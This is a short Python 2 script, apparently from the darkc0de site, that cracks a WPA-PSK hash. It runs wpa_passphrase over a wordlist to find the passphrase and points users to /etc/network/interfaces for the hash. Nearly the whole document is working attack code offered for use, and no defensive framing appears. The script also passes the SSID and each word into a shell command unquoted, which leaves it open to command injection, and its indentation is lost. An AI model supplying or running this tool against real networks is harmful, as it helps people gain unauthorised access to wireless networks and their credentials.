Python script that cracks a 256-bit WPA-PSK hash (64 char) using wpa_passphrase and a wordlist.
64f83af457754e31a3d03e207fb755e633bab664fab632e28121f6d198cb0ca0
#!/usr/bin/python
#Cracks a 256-bit WPA-PSK hash (64 char) using wpa_passphrase
#and a wordlist.
#This uses the linux tool wpa_passphrase to generate a 256-bit PSK.
#Make sure you have this tool prier to using this cracker.
#d3hydr8@linuxbox:~$ man wpa_passphrase
#d3hydr8@linuxbox:~$ wpa_passphrase <ssid> <paraphrase>
#Check the /etc/network/interfaces file for this hash. It will look something like this.
#auto lo
#iface lo inet loopback
#iface eth1 inet dhcp
#wpa-psk 11f3833adac3ed17ad05031c18170597ae0f911eed618927513c5d40a800b9d8
#wpa-driver wext
#wpa-key-mgmt WPA-PSK
#wpa-proto WPA
#wpa-ssid darkc0de
#auto eth1
#Hash: 11f3833adac3ed17ad05031c18170597ae0f911eed618927513c5d40a800b9d8
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import md5, sys, commands, getopt, StringIO, re
def gethash(word):
cmd = "wpa_passphrase "+sys.argv[2]+" "+word
out = StringIO.StringIO(commands.getstatusoutput(cmd)[1]).read()
hash = re.findall("[a-f0-9]"*64,out)
if len(hash) > 0:
return hash[0]
if len(sys.argv) != 4:
print "Usage: ./wpacrack.py <hash> <ssid> <wordlist>"
sys.exit(1)
if len(sys.argv[1]) != 64:
print "\nError: Hash length incorrect (64 char)\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "\nError: Check your wordlist path\n"
sys.exit(1)
print "\n",len(words),"words loaded..."
for word in words:
hash = gethash(word.replace("\n",""))
if sys.argv[1] == hash:
print "Password is:",word